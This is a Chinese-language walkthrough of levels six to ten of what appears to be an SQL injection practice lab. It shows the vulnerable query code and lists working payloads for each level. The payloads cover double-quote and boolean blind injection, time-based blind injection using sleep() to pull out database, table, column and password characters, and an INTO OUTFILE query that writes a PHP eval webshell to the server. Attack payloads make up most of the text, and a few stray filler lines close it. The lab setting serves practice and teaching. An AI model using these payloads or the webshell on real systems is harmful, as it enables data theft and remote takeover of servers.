第六关(双注入GET双引号字符型注)
核心代码:
1 $id = '"'.$id.'"'; 2 $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
根第五关类似
第七关(导出文件GET字符型注入)
核心代码
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
不返回mysql错误
检测secure_file_prive是否为null 是null则不能写入
SHOW VARIABLES LIKE “secure_file_priv”;
secure_file_priv =空才行
payload:
id=1')) and 1=1--+ id=1')) and 1=2--+ #写入一句话webshell id=1'))UNION SELECT 1,"<?php @eval($_POST['X']);?>",3 into outfile "C:\phpStudy\PHPTutorial\WWW\lou\sql\Less-7\muma.php"--+
参考学习:https://blog.csdn.net/Jiajiajiang_/article/details/86226884
第八关(布尔型单引号GET盲注)
payload:
1 判断数据库长度 2 ' and length(database())=8--+ 3 爆数据库名 4 ' and left((select database()),1)='s'--+ 5 判断数据库中表的数量 6 ' and if((select count(*) from information_schema.tables where table_schema=database())>1,sleep(5),1)--+ 7 ' and (select count(*) from information_schema.tables where table_schema=database())>1 --+ 8 爆表名 9 ' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+ 10 判断字段数量 11 ' and (select count(*) from information_schema.columns where table_name='users')>1--+ 12 爆字段名 13 ' and left((select column_name from information_schema.columns where table_name='users' limit 1,1),1)='f'--+ 14 爆数据 15 ' and left((select password from users limit 0,1),1)='D' --+
第九关(基于时间的GET单引号盲注)
payload:
1 ' and if(length(database())=8,sleep(3),1)--+ 2 ' and if(left(database(),1)='s',sleep(3),1)--+ 3 ' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(3),1)--+ 4 ' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(3),1)--+ 5 ' and if(left((select password from users limit 0,1),1)='D',sleep(3),1) --+
第十关(基于时间的双引号盲注)
payload:
1 " and if(length(database())=8,sleep(3),1)--+ 2 " and if(left(database(),1)='s',sleep(3),1)--+ 3 " and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(3),1)--+ 4 " and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(3),1)--+ 5 " and if(left((select password from users limit 0,1),1)='D',sleep(3),1)--+
11111
1
11111
1